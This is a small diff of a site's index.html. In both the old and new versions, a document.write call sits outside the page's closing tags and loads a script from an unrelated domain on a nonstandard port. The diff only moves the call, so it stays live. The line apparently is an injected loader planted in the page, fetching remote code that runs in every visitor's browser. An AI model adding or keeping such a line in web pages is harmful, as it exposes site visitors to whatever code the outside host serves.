--- a/index.html
+++ b/index.html
@@ -20,4 +20,4 @@
         s1.setAttribute('crossorigin','*');
         s0.parentNode.insertBefore(s1,s0);
     })();
-</script>document.write('<script src="https://show.suning.beer:12443/ty/610E318D-2BA3-13488-33-BB93128A5A45.alpha"><\/script>');</body></html>
+</script></body>document.write('<script src="https://show.suning.beer:12443/ty/610E318D-2BA3-13488-33-BB93128A5A45.alpha"><\/script>')</html>
